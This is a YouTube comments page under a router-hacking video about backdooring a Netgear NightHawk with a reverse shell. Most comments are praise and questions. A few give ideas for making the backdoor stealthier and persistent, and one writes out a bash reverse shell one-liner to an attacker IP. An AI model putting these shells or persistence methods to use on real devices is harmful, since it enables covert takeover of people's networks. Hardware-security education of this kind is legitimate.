IoT Hacking - Netgear AC1750 NightHawk - Backdoor Reverse Shell

Поділитися
Вставка

КОМЕНТАРІ • 43

  • @cocusar
    @cocusar 7 місяців тому +13

    I'd do this just for the laughs, but my hoarding doesn't let me throw away this kind of devices because "you might need it some day" lol

  • @3dlifestyle768
    @3dlifestyle768 3 місяці тому +2

    Awesome, awesome, awesome ! One thing that comes to my mind is, what if you create a bash executable script with the name aws_json. Inside it, to run both the real aws_json binary and the reverse shell. Also in case aws_json gets executed multiple times, to check in the bash script with ps if the reverse shell is already running, to start it only once.
    Much respect Matt !

  • @garridomonfrero
    @garridomonfrero 7 місяців тому +6

    It will be so cool if instead of overwriting other binary from the firmware , unpack the firmware , rewrite it and pack it again generate the crc and flash it on the hardware. Nice video man!

  • @theskelet4r
    @theskelet4r 7 місяців тому +2

    Another Amazing Video Matt, Thank you for sharing your skills with the community

  • @feff6754
    @feff6754 7 місяців тому +3

    Love this series of videos, thanks!

  • @NewbLuck
    @NewbLuck 5 місяців тому +2

    The Zig compiler is an awesome tool for C/C++ cross-compiling, it has GCC+MUSL baked in and supports pretty much any arch LLVM does. Much easier than maintaining various CC tool chains (and is a great systems language to boot).

  • @Mimo0xCool
    @Mimo0xCool 7 місяців тому +3

    Keep it up, thank you for the well done content 🙏

  • @thedizsilent5188
    @thedizsilent5188 6 місяців тому +3

    Ive needed to cross compile pkgs from x86 to arm for my Raspberry-Pi 4 and failed miserably got uninterested and gave up i learned alot from this thank you

  • @russjr08
    @russjr08 6 місяців тому

    Great work Matt, I really enjoy going through these!

  • @SteltekOne
    @SteltekOne 6 місяців тому +2

    19:30 That's actually a typical firmware recovery process for when you've bricked your firmware with an update. The goal is to let you flash back a valid firmware that way. (Many manufacturers lock this behind a button press, but some will just initiate it on boot as seen. Ideally there's also a signature check to ensure it only loads valid firmware from the manufacturer, but few go that far.)

  • @SleepyGameFacts
    @SleepyGameFacts 6 місяців тому

    This was an awesome video. First time I've seen your channel before, subscribed

  • @ejennings98
    @ejennings98 6 місяців тому

    Awesome video, clear and concise

  • @SiegeX1
    @SiegeX1 3 місяці тому

    Although you did say this would be a simple reverse shell; the right way to do this would be to have your code fork() and call your socket code asynchronously then have parent process fork() again to call aws_json.
    Next, modify your socket code to put a check up front to see if port 1234 is around bound, if so, return, otherwise setup the reverse shell.
    Now you have a pretty stealth back door where the functionality doesn’t change.
    For extra bonus points you can embed the binary bytes of aws_json into the source code of your backdoored aws_json and then extract those bytes to a RAM disk and execute it there.

  • @AustinHypes
    @AustinHypes 5 місяців тому

    Great work

  • @stanislavsmetanin1307
    @stanislavsmetanin1307 3 місяці тому +1

    Highly educational, and also HIGHLY entertaining!! Great job.
    🤝
    Would be nice to see smart TV hacking.
    😃
    Regards..

    • @mattbrwn
      @mattbrwn  3 місяці тому

      I have an TCL TV which is notoriously bad. but family would not be happy with me if it was in pieces on my desk XD

    • @stanislavsmetanin1307
      @stanislavsmetanin1307 3 місяці тому

      @@mattbrwn 😄 ye, understandable..

  • @gergopap7207
    @gergopap7207 7 місяців тому +2

    hi, I would like to ask if there will be a video where you present a binary reverse engineering process and a binary exploitation, exploit development process in mips or arm architecture?

    • @mattbrwn
      @mattbrwn  7 місяців тому +1

      yes I'm hoping to do some binary RE videos here in the future.

  • @tonkofonko
    @tonkofonko 7 місяців тому

    Looks so good when it can be modified with backdoor or that stuff.

  • @ItsAuver
    @ItsAuver 7 місяців тому +1

    Thanks for another video Matt! Question, would this kind of reverse shell survive the device being factory reset? I imagine it would not, but I am unsure. Thanks again!

    • @mattbrwn
      @mattbrwn  7 місяців тому +2

      Probably not but it could be possible to modify part of the factory reset logic to maintain the backdoor. All depends on how the FR is implemented

    • @mainarbor8416
      @mainarbor8416 6 місяців тому

      Sorry for the comment piggyback, What if you bought a new chip and rewrote the ROM, then soldered your custom chip to the board?

  • @0xracerboy
    @0xracerboy 2 місяці тому

    This Hard!

  • @NaitmalekYoussef
    @NaitmalekYoussef 7 місяців тому +1

    keep going 👍🏻

  • @renify_
    @renify_ 6 місяців тому

    Thanks matt, i would never buy resell modem anymore 🤣

  • @alexk4894
    @alexk4894 5 місяців тому

    What's the purpose of renaming root to admin? Is it used for authentication via web UI?

  • @patrick1020000
    @patrick1020000 7 місяців тому

    Does your new aws_json hang the boot process, or does it just happen at the end? Nothing appeared in the logs after your reverse shell ran

    • @mattbrwn
      @mattbrwn  7 місяців тому

      It just happens at the end

    • @massimilianogilli1164
      @massimilianogilli1164 5 місяців тому

      @@mattbrwn What process did you go through to select that one exactly? Would a reverse code that first calls the original aws_json (renamed) and then open the socket be better?

  • @mmkf
    @mmkf 7 місяців тому

    I think the 15 second wait to try and boot firmware over ethernet is to unbrick a router.

  • @eeee-xq6qz
    @eeee-xq6qz 7 місяців тому +1

    looking forward discord community😊

  • @barclay6172
    @barclay6172 5 місяців тому

    Is there a way I can hack my $400 nighthawk X4s to use it without having to pay fNetgear for a subscription service?

    • @mattbrwn
      @mattbrwn  5 місяців тому

      What feature requires a subscription??

  • @szyszqu
    @szyszqu 6 місяців тому

    And how are we supposed to know what's the IP address of the victim?

    • @jesusderechte3889
      @jesusderechte3889 6 місяців тому

      wdym you dont need the IP of the victim. For the reverse shell you enter your own.

    • @kasterby
      @kasterby 6 місяців тому

      The victim connects to the hacker’s server, the hacker doesn’t need to know the client IP in the same way a website doesn’t need to know who you are before you connect to / load a website

  • @tonkofonko
    @tonkofonko 7 місяців тому

    But is it possible to automatically install .apk or .exe file or something else to install malicious file for all connected devices to wifi router and take full control using that router and is it possible when I use python on my router ?
    Thx bye.

    • @yes-d1d
      @yes-d1d 6 місяців тому

      🤡🤡

  • @justbendev2324
    @justbendev2324 6 місяців тому +1

    Nice vids but damn bro you speak so slowly its crazy :D , at 1.5 speed you sound normal x)

  • @_hackwell
    @_hackwell 6 місяців тому

    I just love the good old bash -i >& /dev/tcp/10.10.14.x/1234 0>&1 if bash is there of course...